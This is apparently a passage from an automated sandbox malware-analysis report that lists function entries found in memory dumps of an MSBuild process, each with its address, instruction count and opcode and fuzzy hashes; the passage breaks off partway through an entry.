                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 59d86c0c8595d196daafe255ceefd128068c793118d8da7632f92201b47923fd
                          • Instruction ID: 24fc52902247d4f46f19bd4cec1e6e001feeb77c562f0d110a4fd4d99a9a32cf
                          • Opcode Fuzzy Hash: 59d86c0c8595d196daafe255ceefd128068c793118d8da7632f92201b47923fd
                          • Instruction Fuzzy Hash: F6416230B09601CFD728DB29E498FB97BE7BB88311F5540A9D506CB39ADB799C81CB41
                          Function 05AC8D70 Relevance: .1, Instructions: 106COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6de1c8fdadb0695f74702c01c22fbcf49a456d8b75f56968881351b26a48ff40
                          • Instruction ID: 3411a85dc1c6571b9ce32b61015d88cdd9dce2e9e3b1ed5a645bfda244c47468
                          • Opcode Fuzzy Hash: 6de1c8fdadb0695f74702c01c22fbcf49a456d8b75f56968881351b26a48ff40
                          • Instruction Fuzzy Hash: C7413D71E001199FDB14DBA9D454AEEBBF2BF88710F24C4A9E516B7394CB749C00CBA4
                          Function 05AC3C80 Relevance: .1, Instructions: 103COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 33601d930ae9fd941807f78be9647d8df6c6a5e0164fb7e51363db1a5663c406
                          • Instruction ID: 6cab56fd356e57477546d793b4da28a9f227a016c963f88baaba6b8629dd8ada
                          • Opcode Fuzzy Hash: 33601d930ae9fd941807f78be9647d8df6c6a5e0164fb7e51363db1a5663c406
                          • Instruction Fuzzy Hash: AE41A771A08200CBDF09DB15E544BAA7FB7FBC1314F15C9AEC4169B249E7359C4ACB81
                          Function 05AAE9C0 Relevance: .1, Instructions: 103COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b91f06f4627023b957b268bdfbe85d9d98862c837db3052073f07bf4a373cb36
                          • Instruction ID: 181bb4146d1a3c7567f232fe541e8e39ebb0ad50b5e0f0d1d5fa7cb880b2b46f
                          • Opcode Fuzzy Hash: b91f06f4627023b957b268bdfbe85d9d98862c837db3052073f07bf4a373cb36
                          • Instruction Fuzzy Hash: 43413036A002199FDB14DBA4E954BEEB7B5FF88311F148066D816BB3A4DB319D05CBA0
                          Function 05AAB8D8 Relevance: .1, Instructions: 103COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5adfce102193a5b662fb48b7bdb326694686006b17f9c5c8b21382e614946d48
                          • Instruction ID: a2a2b3e2f69275203f0b209ad1b20cc8001bd1e649d157c7fda2331202c71332
                          • Opcode Fuzzy Hash: 5adfce102193a5b662fb48b7bdb326694686006b17f9c5c8b21382e614946d48
                          • Instruction Fuzzy Hash: 933106366001089FCB05DF58D898EA9BBB2FF48320F1680A9F5099B372C731ED51DB90
                          Function 05AA0AA8 Relevance: .1, Instructions: 103COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: acf29125aa2b16ab12a8785d95c94deb7b8327d494d56a1ca2559b5eb7073881
                          • Instruction ID: 2e54ba40e69aaec44d3c34054928a569a97d65689aeb3ee9cb80a3f4c8477019
                          • Opcode Fuzzy Hash: acf29125aa2b16ab12a8785d95c94deb7b8327d494d56a1ca2559b5eb7073881
                          • Instruction Fuzzy Hash: BA41B372A002168FDB14CFA5CA49BBFBBB1FF44305F00846AD456E7251E730D905CB90
                          Function 05AC8057 Relevance: .1, Instructions: 102COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0e07979fff08ec6f361b9af2c99d0e069d8bbdb18f21e0b50a0483c6c453bb2
                          • Instruction ID: 644b49992c0868894d27a066bbaa7124888f9ce7d6a8a8646b87a7d93e6ec3f0
                          • Opcode Fuzzy Hash: a0e07979fff08ec6f361b9af2c99d0e069d8bbdb18f21e0b50a0483c6c453bb2
                          • Instruction Fuzzy Hash: 52414334B09201CFD718DB29E098BB97BE7BB88351F5580B9D40A87399DB799C45C741
                          Function 02AE5478 Relevance: .1, Instructions: 100COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af33c95300c55246491347a6751ade458bab4a658f6f87c9bae4a5563feadbbe
                          • Instruction ID: c55d66b311047e00923979e847865aabe051213cedcd18efbd769afa111ae2fe
                          • Opcode Fuzzy Hash: af33c95300c55246491347a6751ade458bab4a658f6f87c9bae4a5563feadbbe
                          • Instruction Fuzzy Hash: B231FB302506504BD728FB64E550BAB7BAAFFC0300F508A6CD2464B659DF78ED0ECB95
                          Function 02AE40CC Relevance: .1, Instructions: 97COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 64b65d0602036b3b8a6b6328228f12f86307da47b66d5c56610fd25ef57cc812
                          • Instruction ID: 4051496b01ae3c547da4fadc7a4e146b2b5a38e62c802c4b771a0fb3137c8c64
                          • Opcode Fuzzy Hash: 64b65d0602036b3b8a6b6328228f12f86307da47b66d5c56610fd25ef57cc812
                          • Instruction Fuzzy Hash: FA319034A007028FC768EF78D59062EBBB6FF84364B500B2CD15687694DF35E946CB91
                          Function 059055CF Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7117a64a184276408bab91390edb40f26c05d6454d767924a8ba89ab5da3ee4
                          • Instruction ID: db8eeb3f0d0920c868de44acc122325fc35f403a74a26b668eba5f9634d8e197
                          • Opcode Fuzzy Hash: e7117a64a184276408bab91390edb40f26c05d6454d767924a8ba89ab5da3ee4
                          • Instruction Fuzzy Hash: 28216A74B087415FDB15A525C898F3BABAFBFC2611F0A88BE91118B2C4CE65D801CB94
                          Function 05AA2C48 Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d98b3443431e2db80767d6069d9546ecfa3abf53f5ae6a6d0448dffaed22771
                          • Instruction ID: 15679d4e265c98c9b841f6b11be55acdc8c6762fbf8e791e9c1843ba0d41c802
                          • Opcode Fuzzy Hash: 3d98b3443431e2db80767d6069d9546ecfa3abf53f5ae6a6d0448dffaed22771
                          • Instruction Fuzzy Hash: 4C318D357006159FDB29AF21D844A7ABBB6FF85341B14886DE9128B3A4DF31EC46CB50
                          Function 058FA718 Relevance: .1, Instructions: 86COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 135b279d6ea203e79b0aaffad30d8577ae848f1710c0fc967ede5fd968955e6c
                          • Instruction ID: d518ad28e884b1802f0f1db9b379ebec0e577acb9cc268c15b3d3bf0f0c4bc3e
                          • Opcode Fuzzy Hash: 135b279d6ea203e79b0aaffad30d8577ae848f1710c0fc967ede5fd968955e6c
                          • Instruction Fuzzy Hash: AA314870A002099FDB18DF68D548AA9B7F2BF4C314F108069D906E7365DB749D45CB90
                          Function 0590499E Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3509e5950505fedc52cf4f9d068384babbcd7db4743e9c080b2361af714b39d
                          • Instruction ID: 43746c76c4cd77c9221ebdd6485751d9eac4b8a5744573b9e25173dc50f79fad
                          • Opcode Fuzzy Hash: f3509e5950505fedc52cf4f9d068384babbcd7db4743e9c080b2361af714b39d
                          • Instruction Fuzzy Hash: 7231D734A01225CFEF28DB14CA60FB9B3B6BF54605F4169D99A0AAB3D0D730AD40CE91
                          Function 05AAA348 Relevance: .1, Instructions: 83COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cb7f39155fe33b42e40416358227218f35198cc25f304c49f12fea2a79da5afd
                          • Instruction ID: 34dfc7326393fb1ae5163e510537bb6a071a209f1ce784a174b2e51aad09a858
                          • Opcode Fuzzy Hash: cb7f39155fe33b42e40416358227218f35198cc25f304c49f12fea2a79da5afd
                          • Instruction Fuzzy Hash: 5A21F5373042008FC3218B6AE848A6ABBE5EFC1321B15847AE55ECB661DB30EC46C760
                          Function 059055F0 Relevance: .1, Instructions: 81COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe6e5d0b4b3e67e5029acde66b5f03e39645ef9f5a33b991dbcd462ffedd31f0
                          • Instruction ID: e08beadfb4fd2fa8a16c6151ed64110edba7f0a6cc5668e55e67ab696788389e
                          • Opcode Fuzzy Hash: fe6e5d0b4b3e67e5029acde66b5f03e39645ef9f5a33b991dbcd462ffedd31f0
                          • Instruction Fuzzy Hash: CD213A30B046121BDB18A5298998F7F969FBFC5610F198D7D96164B2C4CE79EC01CBE4
                          Function 05AC4218 Relevance: .1, Instructions: 79COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1074add484c99a3549e116904ac8fb1f084d37023364a9cd36fb5192fe0e2bfa
                          • Instruction ID: f2929f9d84d12b8890d4b3ead32da4f0a1f80f35cde86f7c4c89602e2335795e
                          • Opcode Fuzzy Hash: 1074add484c99a3549e116904ac8fb1f084d37023364a9cd36fb5192fe0e2bfa
                          • Instruction Fuzzy Hash: BD219E30A08105CFDF04EF69E950BBE7FB6FB89212F1481A9D41A97295DB348902CB89
                          Function 058FEA30 Relevance: .1, Instructions: 79COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43305891cd62a36a29f11d7ea74f9685d0bf943f4a078697d90f48a9b6d67c2d
                          • Instruction ID: d9c2f94d87b02d85dd518c4a75eac92d9e9c1677f367868c794fbe0bfbf8f164
                          • Opcode Fuzzy Hash: 43305891cd62a36a29f11d7ea74f9685d0bf943f4a078697d90f48a9b6d67c2d
                          • Instruction Fuzzy Hash: 51317C30B04108CFEB54CB19E448BAA77ABBB8C305F1480B5EA06E72A9DB711D45CB61
                          Function 05904A1B Relevance: .1, Instructions: 79COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6024f086d118118c71c64f2dd8760c894f0039b540bdfcacf85c01cf0a32a2f7
                          • Instruction ID: cd97a12412ed98bf589a084410533d3a377fa7482069b6830853d2bdcfc34744
                          • Opcode Fuzzy Hash: 6024f086d118118c71c64f2dd8760c894f0039b540bdfcacf85c01cf0a32a2f7
                          • Instruction Fuzzy Hash: AB31D734A01225CFEF28DB14CA60FBDB3B6BF54605F4159D99A0AAB3D0DB70AD41CE91
                          Function 02AE2EE8 Relevance: .1, Instructions: 78COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ec92a6d25ec27af14d7b9015ca01f346116a2fa320c189ad1a85f7cceabfe73
                          • Instruction ID: d19889c08c41b41ed04b7e868bb70f7335a82838dd519282780f693715772d3c
                          • Opcode Fuzzy Hash: 3ec92a6d25ec27af14d7b9015ca01f346116a2fa320c189ad1a85f7cceabfe73
                          • Instruction Fuzzy Hash: AA210630B102049FDB159F64D454BAEBBB6FF89300F10852AE502AB2A1DF708C46C780
                          Function 05AAC9B0 Relevance: .1, Instructions: 78COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b8c810d0e89e2646dc65a3bf2da3ac18ee6adf0eebd43995a0a6e3fed0aa63b
                          • Instruction ID: f14121a96c6b4fbd6da3c1519d76073c28113c381b744ef90b262efbd518231b
                          • Opcode Fuzzy Hash: 8b8c810d0e89e2646dc65a3bf2da3ac18ee6adf0eebd43995a0a6e3fed0aa63b
                          • Instruction Fuzzy Hash: AE218635B106098FCB05EF68D5549AEB7F6FF89700B10412AE506A7364EF74AE06CBE1
                          Function 02AED29F Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 64bc5fd0cd81c92ec9735110372c0c75cfde1c3d0bcf91f0d9040ab8df7912ba
                          • Instruction ID: 8f6384db42654ce0fee53fbddedf5c05f58153b4a684724064348ae3046486b0
                          • Opcode Fuzzy Hash: 64bc5fd0cd81c92ec9735110372c0c75cfde1c3d0bcf91f0d9040ab8df7912ba
                          • Instruction Fuzzy Hash: 22219C71A049058FCF18CBA8D184AACB7F5FF98224F1586D5D00BAB261CB35ED03CB51
                          Function 059045EF Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ddd5855601785838ec8d6132ed7149e952325597d46730e45007b4f388646120
                          • Instruction ID: 9e73c6150bc915c467b1356d5b28c9d670de2d0e496fd3e67acc28ed09b0850a
                          • Opcode Fuzzy Hash: ddd5855601785838ec8d6132ed7149e952325597d46730e45007b4f388646120
                          • Instruction Fuzzy Hash: E721B575E0024A9FCF14CF94C9106EEBBB6BF85304F14D52AD905BB784EBB1D4468B80
                          Function 05AA24F8 Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cf165e3e67bf6af77fda8a59f29135c4e3f6f802e5520189c1f1142254f01ec
                          • Instruction ID: 10871ad4429e6cb5017b4c9d8094960e63814d34b04fad07de6c4d56edee1576
                          • Opcode Fuzzy Hash: 9cf165e3e67bf6af77fda8a59f29135c4e3f6f802e5520189c1f1142254f01ec
                          • Instruction Fuzzy Hash: BE21C036B0021A8F8B109BA9E8549BEB7BBFF80221B544476E826D7240EB35DC15C760
                          Function 05AA88C8 Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3bffd3a06786d4f66f6c1219ce9a108ad842263639b2aff0cbd3eaacf918fff6
                          • Instruction ID: ed640c6dc53d8134d043e78c5d4121a78fe71d8946e1be6be0bdbecb0e00aff1
                          • Opcode Fuzzy Hash: 3bffd3a06786d4f66f6c1219ce9a108ad842263639b2aff0cbd3eaacf918fff6
                          • Instruction Fuzzy Hash: 91213072900616AFCB14DF58C980EAAFBB6FF40310F058669C4164B246C338E892CBC6
                          Function 05AA2AE0 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d344a7450e1308f141e0b421dae27f26c29a8a71ea067cb72b26818522e8f49
                          • Instruction ID: a318b1020ea13e661587708b49fc1ffff0f312f624e2abddb34a418fd4000a96
                          • Opcode Fuzzy Hash: 2d344a7450e1308f141e0b421dae27f26c29a8a71ea067cb72b26818522e8f49
                          • Instruction Fuzzy Hash: AD214876E0421ADFDB50DFB8C504BAEBBF6AF44350F108066D52ADB290E734CA61CB91
                          Function 02AE3AE5 Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 773d4dae20d2c2710a2c08d84838613ac2027cead25f0f89b455065655ab5030
                          • Instruction ID: f4f6b8b219a7ce90cacb7fcd0c53bb1dbc6c1335bb5b3274828bcfa72acec85e
                          • Opcode Fuzzy Hash: 773d4dae20d2c2710a2c08d84838613ac2027cead25f0f89b455065655ab5030
                          • Instruction Fuzzy Hash: D731D634A01218EFCF44DF94D995AADBBF2FF88314F1480A8E506AB355CB71AD86CB40
                          Function 02AE6B90 Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43ab9f76a9918ef4271614f953a971c677dbb1cad2297b929f2951ebdfd422b8
                          • Instruction ID: 33c16aa51b1ca498e33197294f53967262104f7797e2febde934e1a0d44d0c64
                          • Opcode Fuzzy Hash: 43ab9f76a9918ef4271614f953a971c677dbb1cad2297b929f2951ebdfd422b8
                          • Instruction Fuzzy Hash: B7319C34E002158FDB28DFA8C590ADEBBF6AF88720F108559D502BB351CB30A946CBA1
                          Function 05ACAF50 Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 174731c6be5601f91ea6c011675cb6ff364196a8267c939589cb52a71765fbc5
                          • Instruction ID: 49eaf30d721abe16da4882051d5667cece0b1ee44fe91cf52e0d6476406b1238
                          • Opcode Fuzzy Hash: 174731c6be5601f91ea6c011675cb6ff364196a8267c939589cb52a71765fbc5
                          • Instruction Fuzzy Hash: 72210471A0426CDFDB20CBA8D544FBA7FB6EB85310F1580EAE415D7281C631EC428BE2
                          Function 05904A9D Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa9e8fb66a36e8c8328b8fcf3143fac13ae4a86af94b0e3dbaae98447de48beb
                          • Instruction ID: f5fb465ff0339c1ada29a48834c5ad9782e2618c5751209d9a794e4fed11eb8b
                          • Opcode Fuzzy Hash: aa9e8fb66a36e8c8328b8fcf3143fac13ae4a86af94b0e3dbaae98447de48beb
                          • Instruction Fuzzy Hash: C531EA34A01225CFEF28DB10CA64FADB3B6BF54604F4159D99A0AAB3D0DB70AD41CE91
                          Function 02AE6BA0 Relevance: .1, Instructions: 73COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe8361e492321123b6497d7fbaa0b65866ef6b521bd064ed9efe5d92279084ca
                          • Instruction ID: 7b108f8f15447faaf4673ea99fca1a3b6eb8397a0507688844d809cac377d599
                          • Opcode Fuzzy Hash: fe8361e492321123b6497d7fbaa0b65866ef6b521bd064ed9efe5d92279084ca
                          • Instruction Fuzzy Hash: 35318F34E002198FCB18DFA9C590ADEBBF6AF89710F108559D902BB351CF30A945CFA1
                          Function 05AAB8C8 Relevance: .1, Instructions: 73COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7212f959077e8e860670275283931667f378442a7a3074595bcff76ea68307fd
                          • Instruction ID: f32a49431b826e5991e047b392d02e601de889a4da2d4bfb6e468427cd1e7c7f
                          • Opcode Fuzzy Hash: 7212f959077e8e860670275283931667f378442a7a3074595bcff76ea68307fd
                          • Instruction Fuzzy Hash: 4A214D76A00115DFCB05CF99D998E99BBB2FF49320F0640A9F6059B372D732E811DB50
                          Function 058FABA0 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 116bf2a6f8c37b3d86bfb5f9c76a6c8b1ddd929faf7b6694c8c7904400ddedfb
                          • Instruction ID: 1ed40e947c9804cd553452dee337fd1ee9e4b9475b0087d8e52d23d7147f876e
                          • Opcode Fuzzy Hash: 116bf2a6f8c37b3d86bfb5f9c76a6c8b1ddd929faf7b6694c8c7904400ddedfb
                          • Instruction Fuzzy Hash: 74215C316042689FE7159769E844B263BEAEB89320F0A8072DE49C7286D735DC41C792
                          Function 05AA0007 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 51e0f2f8acf0b47d8d8dcffac2efb69baf229ddc1f8cdfea22a32ed4edfe59f0
                          • Instruction ID: bd264987ba98d59875b096ce0bc87bbbd36038b790091fc7f02009bdcecdbaea
                          • Opcode Fuzzy Hash: 51e0f2f8acf0b47d8d8dcffac2efb69baf229ddc1f8cdfea22a32ed4edfe59f0
                          • Instruction Fuzzy Hash: B721C5366083809FCB168B74DC55BAA7FF1BF4A640F0940A6E941CB292EB35CC05CB60
                          Function 05AABFD0 Relevance: .1, Instructions: 71COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f6fcb8d916866d71bcc3d3022eb18c4b183b22d487215efe9a634b4acabc3e8
                          • Instruction ID: a4bda4325d5bd7dbdf35ba133fc4d22338c11d71c63d69f54ce31a05946ab54e
                          • Opcode Fuzzy Hash: 1f6fcb8d916866d71bcc3d3022eb18c4b183b22d487215efe9a634b4acabc3e8
                          • Instruction Fuzzy Hash: F101B7379001199FDB05CF94D814C99BB76FF89320B0684A5EA05AB226D672E925EB90
                          Function 05AC988B Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
